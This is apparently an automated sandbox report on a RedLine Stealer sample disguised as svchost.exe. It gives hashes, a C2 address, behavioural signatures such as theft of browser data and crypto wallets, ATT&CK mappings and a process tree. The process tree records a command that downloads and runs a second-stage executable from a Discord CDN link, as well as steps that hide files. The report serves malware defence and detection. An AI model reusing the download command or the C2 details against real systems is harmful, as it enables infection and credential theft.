Analysis

  • max time kernel
    134s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    27-07-2021 13:22

General

  • Target

    svchost.exe

  • Size

    2.3MB

  • MD5

    e2cdbe43745e8ef737fded5c21bfd162

  • SHA1

    533fc6c2aecaeca8211277ffa74d055fb7eb45fc

  • SHA256

    71d3b36be058908e96750ba536922bb0748c3b3dabe78dfc9276bed4b01ea0e6

  • SHA512

    927271572c1db35a050d1a7cf0ad85745d812a5e068f3c25b6d83e60182a46816b7655e0e52aec3dc355830514d7c43b86dfe06c5d5c7cbc3283199f467efd8f

Malware Config

Extracted

Family

redline

Botnet

@Kypidss

C2

45.14.49.109:21295

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 20 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1868
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\svchost\svchost.cmd" /S"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2384
      • C:\Windows\system32\mode.com
        mode 65,10
        3⤵
          PID:2692
        • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
          7z.exe e file.zip -p -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:1604
        • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
          7z.exe e extracted/file_9.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:3504
        • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
          7z.exe e extracted/file_8.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:3580
        • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
          7z.exe e extracted/file_7.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:8
        • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
          7z.exe e extracted/file_6.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:3872
        • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
          7z.exe e extracted/file_5.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:2496
        • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
          7z.exe e extracted/file_4.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:2188
        • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
          7z.exe e extracted/file_3.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:2684
        • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
          7z.exe e extracted/file_2.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:1664
        • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
          7z.exe e extracted/file_1.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:2344
        • C:\Windows\system32\attrib.exe
          attrib +H "@Kypidss.exe"
          3⤵
          • Views/modifies file attributes
          PID:2092
        • C:\Users\Admin\AppData\Local\Temp\svchost\@Kypidss.exe
          "@Kypidss.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3792
          • C:\Users\Admin\AppData\Local\Temp\mine.exe
            "C:\Users\Admin\AppData\Local\Temp\mine.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2856
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\63A1.tmp\63A2.tmp\63B3.bat C:\Users\Admin\AppData\Local\Temp\mine.exe"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3972
              • C:\Users\Admin\AppData\Local\Temp\63A1.tmp\63A2.tmp\extd.exe
                C:\Users\Admin\AppData\Local\Temp\63A1.tmp\63A2.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                6⤵
                • Executes dropped EXE
                PID:3704
              • C:\Users\Admin\AppData\Local\Temp\63A1.tmp\63A2.tmp\extd.exe
                C:\Users\Admin\AppData\Local\Temp\63A1.tmp\63A2.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
                6⤵
                • Executes dropped EXE
                PID:1664
              • C:\Users\Admin\AppData\Local\Temp\63A1.tmp\63A2.tmp\extd.exe
                C:\Users\Admin\AppData\Local\Temp\63A1.tmp\63A2.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/869566660368035880/welldone.exe" "welldone.exe" "" "" "" "" "" ""
                6⤵
                • Executes dropped EXE
                PID:1840
              • C:\Users\Admin\AppData\Local\Temp\5743\welldone.exe
                welldone.exe
                6⤵
                • Executes dropped EXE
                PID:3988
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 3988 -s 1064
                  7⤵
                  • Program crash
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2628
              • C:\Users\Admin\AppData\Local\Temp\63A1.tmp\63A2.tmp\extd.exe
                C:\Users\Admin\AppData\Local\Temp\63A1.tmp\63A2.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
                6⤵
                • Executes dropped EXE
                PID:3844
          • C:\Users\Admin\AppData\Local\Temp\clip.exe
            "C:\Users\Admin\AppData\Local\Temp\clip.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1648
            • C:\Users\Admin\AppData\Local\Temp\clip.exe
              "C:\Users\Admin\AppData\Local\Temp\clip.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:3776
              • C:\Users\Admin\AppData\Local\Temp\clip.exe
                C:\Users\Admin\AppData\Local\Temp\clip.exe
                6⤵
                • Executes dropped EXE
                PID:2648

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Hidden Files and Directories

    1
    T1158

    Defense Evasion

    Hidden Files and Directories

    1
    T1158

    Credential Access

    Credentials in Files

    2
    T1081

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Collection

    Data from Local System

    2
    T1005

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\clip.exe.log
      MD5

      5b50852bf977f644bcd5997b7b5883c1

      SHA1

      8b53694b796620422b366dc5b8dbb3ce3060473c

      SHA256

      667bc8c8d53eddf6355877344b669db4fb9762e6320afc7316c3786213a254a9

      SHA512

      7e794fa7de5eca585000ef840ca821f36205d25b389747339d8b8d58b1ef3cd16306e62288f86027cbe6a76eeccc9dc7634a11c94ba551f3ce42ee874fac712d

    • C:\Users\Admin\AppData\Local\Temp\5743\welldone.exe
      MD5

      4ee1fe5a7eae87277c898e6c98757e18

      SHA1

      a39f79d4ed22968ff8c447ea31e532b2fac918f6

      SHA256

      e6fb06214233bf43c1288b9e491753e2382beaaf170dd27e80a20d19f0273add

      SHA512

      ce8d99b5e32463628a618c47a7871515d3c068c9cc97411c2b98e7d3109973d33af134d6a56a5cc4ae6553aafd2283f14f0bf2bc48f569ef4a4864a3fdbc9c1c

    • C:\Users\Admin\AppData\Local\Temp\5743\welldone.exe
      MD5

      4ee1fe5a7eae87277c898e6c98757e18

      SHA1

      a39f79d4ed22968ff8c447ea31e532b2fac918f6

      SHA256

      e6fb06214233bf43c1288b9e491753e2382beaaf170dd27e80a20d19f0273add

      SHA512

      ce8d99b5e32463628a618c47a7871515d3c068c9cc97411c2b98e7d3109973d33af134d6a56a5cc4ae6553aafd2283f14f0bf2bc48f569ef4a4864a3fdbc9c1c

    • C:\Users\Admin\AppData\Local\Temp\63A1.tmp\63A2.tmp\63B3.bat
      MD5

      ed1541b47f70ff21edfdc394f41510df

      SHA1

      01e028e193852110d1b9edadd10882a6a02fcbda

      SHA256

      803dc6487316695c5e50f85a579cb93afa7489aa4c7a3a431cd2506a296ede08

      SHA512

      37402b95c6522781514528b4e695814f057147a4859ed35044a43e242021acfdb362881000f424cbeee0bc0b2e2de2a1cc8c3234025a2b78d805744c50cb243b

    • C:\Users\Admin\AppData\Local\Temp\63A1.tmp\63A2.tmp\extd.exe
      MD5

      c14ce13ab09b4829f67a879d735a10a1

      SHA1

      537e1ce843f07ce629699ef5742c42ee2f06e9b6

      SHA256

      ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

      SHA512

      c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

    • C:\Users\Admin\AppData\Local\Temp\63A1.tmp\63A2.tmp\extd.exe
      MD5

      c14ce13ab09b4829f67a879d735a10a1

      SHA1

      537e1ce843f07ce629699ef5742c42ee2f06e9b6

      SHA256

      ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

      SHA512

      c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

    • C:\Users\Admin\AppData\Local\Temp\63A1.tmp\63A2.tmp\extd.exe
      MD5

      c14ce13ab09b4829f67a879d735a10a1

      SHA1

      537e1ce843f07ce629699ef5742c42ee2f06e9b6

      SHA256

      ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

      SHA512

      c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

    • C:\Users\Admin\AppData\Local\Temp\63A1.tmp\63A2.tmp\extd.exe
      MD5

      c14ce13ab09b4829f67a879d735a10a1

      SHA1

      537e1ce843f07ce629699ef5742c42ee2f06e9b6

      SHA256

      ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

      SHA512

      c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

    • C:\Users\Admin\AppData\Local\Temp\63A1.tmp\63A2.tmp\extd.exe
      MD5

      c14ce13ab09b4829f67a879d735a10a1

      SHA1

      537e1ce843f07ce629699ef5742c42ee2f06e9b6

      SHA256

      ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

      SHA512

      c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

    • C:\Users\Admin\AppData\Local\Temp\clip.exe
      MD5

      04add12366c57e33f73821dc72acda39

      SHA1

      d843bdcad9ae216bf542b1f36eddfb9b23aa665e

      SHA256

      855123188c3c97b9b3ec0972c5747c11b54419ebb4a003e9680f7563cc58f9ec

      SHA512

      346eb14af5fe2d3ae4ea98fc01750c4b6783d929182f64ccc1cdcb461c65b25fa5667455405c4a3a7e8921b7997f76fa907a7fa54780218a124f286485ee6fa2

    • C:\Users\Admin\AppData\Local\Temp\clip.exe
      MD5

      04add12366c57e33f73821dc72acda39

      SHA1

      d843bdcad9ae216bf542b1f36eddfb9b23aa665e

      SHA256

      855123188c3c97b9b3ec0972c5747c11b54419ebb4a003e9680f7563cc58f9ec

      SHA512

      346eb14af5fe2d3ae4ea98fc01750c4b6783d929182f64ccc1cdcb461c65b25fa5667455405c4a3a7e8921b7997f76fa907a7fa54780218a124f286485ee6fa2

    • C:\Users\Admin\AppData\Local\Temp\clip.exe
      MD5

      04add12366c57e33f73821dc72acda39

      SHA1

      d843bdcad9ae216bf542b1f36eddfb9b23aa665e

      SHA256

      855123188c3c97b9b3ec0972c5747c11b54419ebb4a003e9680f7563cc58f9ec

      SHA512

      346eb14af5fe2d3ae4ea98fc01750c4b6783d929182f64ccc1cdcb461c65b25fa5667455405c4a3a7e8921b7997f76fa907a7fa54780218a124f286485ee6fa2

    • C:\Users\Admin\AppData\Local\Temp\clip.exe
      MD5

      04add12366c57e33f73821dc72acda39

      SHA1

      d843bdcad9ae216bf542b1f36eddfb9b23aa665e

      SHA256

      855123188c3c97b9b3ec0972c5747c11b54419ebb4a003e9680f7563cc58f9ec

      SHA512

      346eb14af5fe2d3ae4ea98fc01750c4b6783d929182f64ccc1cdcb461c65b25fa5667455405c4a3a7e8921b7997f76fa907a7fa54780218a124f286485ee6fa2

    • C:\Users\Admin\AppData\Local\Temp\mine.exe
      MD5

      a71e5bd022c844df2ef80234f5ad0691

      SHA1

      9ce9dc60e09c536e62fdf60bc90318fd6299dcd4

      SHA256

      fdd3be574e0628170c34bba09040b12864014ab7701327634c202f462830981a

      SHA512

      aaa65d7c8b10200e053f4a04ee335fb122571a291b3dd07bec298ada1f1dc77145d63336a35978d6f98a3ba6b2fd1370ae600a8f2a8206f8ac995b347107f082

    • C:\Users\Admin\AppData\Local\Temp\mine.exe
      MD5

      a71e5bd022c844df2ef80234f5ad0691

      SHA1

      9ce9dc60e09c536e62fdf60bc90318fd6299dcd4

      SHA256

      fdd3be574e0628170c34bba09040b12864014ab7701327634c202f462830981a

      SHA512

      aaa65d7c8b10200e053f4a04ee335fb122571a291b3dd07bec298ada1f1dc77145d63336a35978d6f98a3ba6b2fd1370ae600a8f2a8206f8ac995b347107f082

    • C:\Users\Admin\AppData\Local\Temp\svchost\7z.dll
      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\svchost\7z.exe
      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\svchost\@Kypidss.exe
      MD5

      6feb31e3fbfadaf1029223c60bc0d60c

      SHA1

      13555e90f6bd008c03403e09fcd17d6a65ab461f

      SHA256

      b059aaa7da26904746289493bcc558f552408b0a4df2e86ff8ed0c675f4dc23e

      SHA512

      5680e753eb00386413fa4352a9169b6a0d1eb13b6ae5fe9c167e9999d40634d9318fe2bc91c6f76df22f00e0dc174fc38207a601024bf9f3093e71924eef44cb

    • C:\Users\Admin\AppData\Local\Temp\svchost\extracted\@Kypidss.exe
      MD5

      6feb31e3fbfadaf1029223c60bc0d60c

      SHA1

      13555e90f6bd008c03403e09fcd17d6a65ab461f

      SHA256

      b059aaa7da26904746289493bcc558f552408b0a4df2e86ff8ed0c675f4dc23e

      SHA512

      5680e753eb00386413fa4352a9169b6a0d1eb13b6ae5fe9c167e9999d40634d9318fe2bc91c6f76df22f00e0dc174fc38207a601024bf9f3093e71924eef44cb

    • C:\Users\Admin\AppData\Local\Temp\svchost\extracted\ANTISC~1.DAT
      MD5

      029d8f9ffcbaa8d159537ecb51b8b40d

      SHA1

      bc67ac7339d5f92f5f8b82914570346a7726ad56

      SHA256

      a517d9a37af067b1135f901ef24a4569e810aeddbedc188be70eb25ce865a5d9

      SHA512

      5d6d169ba7c674356c1062ffcea5cf003b1ec00c7c9172f981d194a067cb72869311f107b8a18aa4c964d8d97852212fb7c76a6a9ef7c737d8f6841f17f7e7dd

    • C:\Users\Admin\AppData\Local\Temp\svchost\extracted\file_1.zip
      MD5

      1410f52a4450065eda4ff0e4384d4d87

      SHA1

      91b3aca68b974f7f227a19d5193abc41ab1fb57f

      SHA256

      566729a30e9eb2ec17855aa0bca0b68bb6e239067725f05b4fcbb10c1e9ea851

      SHA512

      07eb18849cd6247b16a4eb48e55dce3a8212c318ac13ca04bb40d0daa59c33ddffbe836975c10263e991183c2f24564df1cd51980239a935ebf81f49fa34bb53

    • C:\Users\Admin\AppData\Local\Temp\svchost\extracted\file_2.zip
      MD5

      eb3589a039e50801ccedbdc2fe019213

      SHA1

      db1689b29d5a18d0a39c4c2cab8969c5cd54b67e

      SHA256

      d688fa7f2429ca3047284470660bc28b75209f3451b1b50eda6e8a75a970c0d5

      SHA512

      d452d0b63aea51e77fba2726d76824607750299ccbe3fdb73373339ea392a30d0deae8864bb9624340c635255f194558350d223fb04c1c03992e2d9e07aca4fe

    • C:\Users\Admin\AppData\Local\Temp\svchost\extracted\file_3.zip
      MD5

      cd3a07e4b4503ca247db22d431c9c34c

      SHA1

      17fdfa18284b4f8d37ae78b3ae8c42f0b4626dea

      SHA256

      56c9586c32b71bb2d92e8dd80ac79e764f05d88ccdef4f6113686e99ca928cb4

      SHA512

      3fdfb94dee436ee7062f3ac6c1cd3699cdb845ddd820626b2e46c362ad978001ec05cc34532b6bacc3ed7c97304b6c0bb20d1ce0cfa3b9e3d293aa58ca231466

    • C:\Users\Admin\AppData\Local\Temp\svchost\extracted\file_4.zip
      MD5

      121bbc518d0197533acad96be6912689

      SHA1

      88ecc86c2a4e3a3e4f3cd6e76856ecfa24c9dac7

      SHA256

      61f5e438ad11b778bfa9536deb946982febece34cfd2adbaa374b2e20a06b149

      SHA512

      5afc6c5f2567bf50734be6f5f1416d7b538a9848c17928ada4498567a13235af7b5b3d65c5b6e6f876f9de91d96e09ce4c6ffbe10fcc6672fa77c4f9540cf228

    • C:\Users\Admin\AppData\Local\Temp\svchost\extracted\file_5.zip
      MD5

      6c4fe4407cbe541fbad8fe96caa4cd8c

      SHA1

      66e09294d336eeebbc632f5cd11e63f078c1492b

      SHA256

      b6be02309134d09336a28d03812a98a61cb1e43b8458c258f39a70477b69a0e6

      SHA512

      3415ef2f80113c8424092f8404da3aa97adc5463a5acfc6475b41048c7b09b2d712a5f31689b5854ee7c7971721cd3e2576b8366cf6d62878973fe4c3af5597e

    • C:\Users\Admin\AppData\Local\Temp\svchost\extracted\file_6.zip
      MD5

      99cf0c2d1b2b4ea537117cfbfe2f2fbb

      SHA1

      485799f1c051b1f9fa46cbbb7a9466e8a82fc8d5

      SHA256

      c9e503e701e324f2803ed62b8522e6170c1ddba75d025c90df1240e79837ac46

      SHA512

      e9cfd12ad34ac9781cb1ac1f76971b92cc2ba857b49d2eea3c9de6ba18c716ca7b489ef170a053d064d5a1c672174617624b6911de5e70d5f3b7b25d1bd5d7cc

    • C:\Users\Admin\AppData\Local\Temp\svchost\extracted\file_7.zip
      MD5

      eadc28732020b3319b7d7c4fd6aa72bb

      SHA1

      1f41c976ae6c8d96bf21f5b0b04681bbb2e7eeed

      SHA256

      7f60367638ee68732ab3abf752612fcea95ac78ec8087aff768aee4fe559dd5c

      SHA512

      0b290a0b760b36c760b21e7f6436ffc75ed45d5045a8dd8ab4b67c8630993a696c8c9b813ce7a2bbb6d15212f6a640a23a43c31e30533b4215a77162af0b38f1

    • C:\Users\Admin\AppData\Local\Temp\svchost\extracted\file_8.zip
      MD5

      7558a4fa8de4a19e9ec071f1782a7de9

      SHA1

      6c4f3db4641fb6b276c0d66796fbfa57ad52c3d2

      SHA256

      9c78566c25906ad8bcf1acb24c9db492a025cca84dfabf461b6d7be6c2bbdf1e

      SHA512

      02d711475e42dd8f563e82a1fbaf1dffcb70495d6a1219846415e718049105492fcc86462af0aa92ee6387290ed0e5d991f8fb9e3900c10c9b68c424579f4874

    • C:\Users\Admin\AppData\Local\Temp\svchost\extracted\file_9.zip
      MD5

      da41aef5b2e0a6779d333d3de7b02fb6

      SHA1

      0997c325ca6d090d4bf80d8dbf85b3f3687238ce

      SHA256

      b5f6b7a15e2f5d575da70e202c88a84a2d12f0128eb29885545e8e620c853930

      SHA512

      a1b001bc60c641cd6a3475eed33b9b663ee5e1a0184c8f92b462c5c286ceb62e19918dcad6a7d57eacbf859fd5bc9cb41b298034621695e80fc5be5dfb6f0eb1

    • C:\Users\Admin\AppData\Local\Temp\svchost\payload.data
      MD5

      e79e2a61063b7bc37428241f10b65547

      SHA1

      b80195593d61983442d5b558cd802a175d21da9a

      SHA256

      6a627f0efbdc9cc0ebc0fcad4ce97079c26f4b6fe82306f6028edc9db1bd6a13

      SHA512

      ffe5db607d72bc779678c7adb1e3104c3a06f13b176d7b692ff9262d459b869d878f1f0f77e1e5eae67e13ebea52d9b50cd53ee9acd2f965d1fce57f1f0410ee

    • C:\Users\Admin\AppData\Local\Temp\svchost\svchost.cmd
      MD5

      3d6f2c801b9db9dc925340fe9536a3d7

      SHA1

      5668f9f7531fd6e54b2be62dcd2a6386e0b8844a

      SHA256

      71d710c4d18688543cf824b147e904de2525cd725c977680693b1f45ac4cf549

      SHA512

      65418c25c2377993135f5909806102d641379fdd1ecaea9d6f98c4141b4f6a6f23f23e6f9c110e46c9479f71dbbe985d15a93146db533e35671669678ec1e337

    • \Users\Admin\AppData\Local\Temp\svchost\7z.dll
      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • \Users\Admin\AppData\Local\Temp\svchost\7z.dll
      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • \Users\Admin\AppData\Local\Temp\svchost\7z.dll
      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • \Users\Admin\AppData\Local\Temp\svchost\7z.dll
      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • \Users\Admin\AppData\Local\Temp\svchost\7z.dll
      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • \Users\Admin\AppData\Local\Temp\svchost\7z.dll
      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

